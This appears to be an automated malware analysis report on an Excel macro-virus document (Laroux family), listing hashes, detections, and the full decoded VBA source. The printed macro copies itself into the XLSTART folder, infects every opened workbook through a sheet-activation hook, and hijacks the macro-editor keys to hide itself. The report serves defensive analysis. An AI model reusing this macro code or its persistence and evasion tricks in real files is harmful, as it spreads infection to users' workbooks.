Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0b9cb1b3a9295a2c…

MALICIOUS

Office (OLE)

127.0 KB Created: 2006-09-13 11:21:51 Authoring application: Microsoft Macintosh Excel First seen: 2014-09-26
MD5: 042476a2f59af2a846bb121a667b00d4 SHA-1: aa21834dd18e96c3f25b5e7d63a99cd0cf1d17bd SHA-256: 0b9cb1b3a9295a2cb6794e08182945f1066a95fadf29362d0302cd3d9138bd05
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Excel macro document that attempts to establish persistence by copying itself to the Excel startup folder ('XLSTART'). It also hooks Excel events and keyboard shortcuts to evade inspection and spread to other workbooks. The macro code explicitly saves the workbook as 'StartUp.xls' in the `Application.StartupPath`.

Heuristics 7

  • ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
      If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
      Application.OnSheetActivate = "StartUp.xls!acop"
  • VBA hooks the VBE-editor / macro-list keys to evade inspection high OLE_VBA_VBE_KEY_HOOK_EVASION
    The macro reroutes Alt+F11 (Visual Basic editor) and/or Alt+F8 (macro list) through Application.OnKey, so an analyst's attempt to open the macro code is intercepted. This anti-analysis trick is a hallmark of resident Excel macro viruses hiding the viral module while it is loaded.
    Matched line in script
      Application.OnKey "%{F11}", "StartUp.xls!escape"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/illustrator/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/t/pg/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/Dimensions#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/g/In document text (OLE body)
    • http://ns.adobe.com/pdf/1.3/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1425 bytes
SHA-256: 02b1a6d703fd2866bddbda131f3d5366be5201e48b719ed7451cb6820f8e09f2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").del
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!acop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub acop()
Attribute acop.VB_ProcData.VB_Invoke_Func = " \n14"
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
Attribute aback.VB_ProcData.VB_Invoke_Func = " \n14"
  On Error Resume Next
  Application.OnKey "%{F8}", "StartUp.xls!escape"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnSheetActivate = "StartUp.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!acop"
  Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.